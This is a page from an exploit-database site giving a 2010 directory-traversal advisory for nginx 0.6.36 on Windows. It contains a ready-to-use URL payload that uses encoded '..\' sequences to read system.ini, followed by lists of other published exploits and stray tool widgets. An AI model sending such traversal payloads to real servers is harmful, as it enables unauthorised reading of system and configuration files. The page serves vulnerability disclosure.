Menu

Search for hundreds of thousands of exploits

"Nginx 0.6.36 - Directory Traversal"

Author

Exploit author

cp77fk4r

Platform

Exploit platform

multiple

Release date

Exploit published date

2010-05-30

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
# Exploit Title: nginx [engine x] http server <= 0.6.36 Path Draversal
# Date: 20/05/10
# Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il
# Software Link: http://nginx.org/
# Version: <= 0.6.36
# Tested on: Win32
#
##[Path Traversal:]
A Path Traversal attack aims to access files and directories that are stored
outside the web root folder. By browsing the application, the attacker looks
for absolute links to files stored on the web server. By manipulating
variables that reference files with dot-dot-slash (../) sequences and its
variations, it may be possible to access arbitrary files and directories
stored on file system, including application source code, configuration and
critical system files, limited by system operational access control. The
attacker uses ../ sequences to move up to root directory, thus permitting
navigation through the file system. (OWASP)
#
http://localhost/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem.ini
#
#
[e0f]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2010-06-22 "PHP Event Calendar 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-06-22 "SoftComplex PHP Event Calendar 1.5 - Multiple Remote Vulnerabilities" webapps php cp77fk4r
2010-06-13 "PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-05-30 "Nginx 0.6.36 - Directory Traversal" remote multiple cp77fk4r
2010-05-18 "phpMyAdmin 2.6.3-pl1 - Cross-Site Scripting / Full Path" webapps php cp77fk4r
2010-04-13 "Blog System 1.5 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-04-12 "Blog System 1.x - Multiple Input Validation Vulnerabilities" webapps php cp77fk4r
2010-04-08 "Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities" remote multiple cp77fk4r
2010-04-08 "miniature java Web server 1.71 - Multiple Vulnerabilities" remote multiple cp77fk4r
2010-04-03 "SafeSHOP 1.5.6 - Cross-Site Scripting / Multiple Cross-Site Request Forgery Vulnerabilities" webapps asp cp77fk4r
2010-04-03 "Java Mini Web Server 1.0 - Directory Traversal / Cross-Site Scripting" remote multiple cp77fk4r
2010-03-27 "Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-02-11 "PHP Captcha Security Images - Denial of Service" dos php cp77fk4r
2010-02-09 "MOJO's IWms 7 - SQL Injection / Cross-Site Scripting" webapps asp cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - Multiple Vulnerabilities" webapps php cp77fk4r
2010-02-06 "ShopEx Single 4.5.1 - 'errinfo' Cross-Site Scripting" webapps java cp77fk4r
2010-01-24 "SilverStripe CMS 2.3.5 - Cross-Site Request Forgery / Open Redirection" webapps php cp77fk4r
2010-01-21 "SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery" webapps windows cp77fk4r
2009-12-25 "cms -db 0.7.13 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-22 "DeluxeBB 1.3 - Multiple Vulnerabilities" webapps php cp77fk4r
2009-12-21 "social Web CMS Beta 2 - Multiple Vulnerabilities" webapps php cp77fk4r
2007-12-17 "MOJO IWms 7 - 'default.asp' Cookie Manipulation" webapps asp cp77fk4r 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected